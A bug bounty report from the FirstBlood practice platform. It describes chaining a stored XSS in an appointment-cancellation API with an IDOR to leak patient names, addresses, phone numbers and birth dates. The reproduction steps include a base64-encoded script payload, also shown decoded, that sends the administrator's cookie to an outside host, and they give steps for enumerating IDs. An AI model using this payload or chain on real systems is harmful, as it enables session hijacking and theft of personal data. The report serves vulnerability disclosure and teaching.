FirstBlood-#83 — Leaking PII data of users who have appointments using stored XSS and IDOR
On 2021-05-10, xnl-h4ck3r reported:
A stored XSS vulnerability exists in the manage appointments api
/api/ma.php. An attacker can make an appointment, and then subsequently cancel it, but add the
messageparameter with an XSS payload that will fire on the admin cancellation page
/drpanel/cancelled.php. This can leak the admins
drpscookie value. This cookie can then be used to make an authorised GET request to
aptidparameter in the query string. An IDOR exists on this parameter that allows an attacker to enumerate the ID and therefore leak personal information for each user that has an appointment. On endpoint
/drpanel/drapi/query.phpthe value of
aptidtakes the format
5691??19where ?? is an even number starting at 02, 04, 06, etc. for each appointment booked. This endpoint will then reveal the Name, Address, Telephone and DOB of the user. User data of ALL patients can also be leaked using the leaked cookie value in a POST request to
/drpanel/drapi/qp.phpand post parameter of
Steps to Reproduce
- Book an appointment on
/book-appointment.htmland make a note of the Appointment ID that is given, e.g.
- Go to
/yourappointments.php, enter your Appointment ID and click Retrieve Appointment
- Run traffic through Burp proxy
- Click CANCEL APPOINTMENT button.
- Go to the last POST to
/api/ma.phpin Burp history and send to Repeater.
- NOTE: ALTHOUGH THE APPOINTMENT HAS BEEN CANCELLED, YOU CAN STILL USE THE APPOINTMEMT ID IN THE API
- Now add the following post parameter
message="%3e%3cscript/src="data:;base64,dmFyIHg9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7eC5vcGVuKCdHRVQnLCcvL3huMS51ay9jPScgKyBkb2N1bWVudC5jb29raWUpO3guc2VuZCgpOw=="%3e%3c/script/x%3eThis is a Base64 encoding of
var x=new XMLHttpRequest();x.open('GET','//xn1.uk/c=' + document.cookie);x.send();
- Send the Request
- Now log in as an administrator and visit endpoint
- Observe the XSS payload firing and sending the value of the admins cookie to my server:
- Make a GET request to
????is enumerated by adding 137 to the previous value each time.
- Observe the user data returned for each appointment:
- Make a POST request to
/drpanel/drapi/qp.phusing the admins cookie, and providing a post parameter of
- Observe the response containing PII data of ALL patients:
The impact of this vulnerability is that an attacker could steal the admins
drpscookie, then enumerate the aptid to then leak the personal data of users with appointments, or make a query to see ALL patients PII.
FirstBlood ID: 8
Vulnerability Type: Stored XSS
When cancelling an appointment, an attacker can add a malicious XSS payload that will execute against administrators/doctors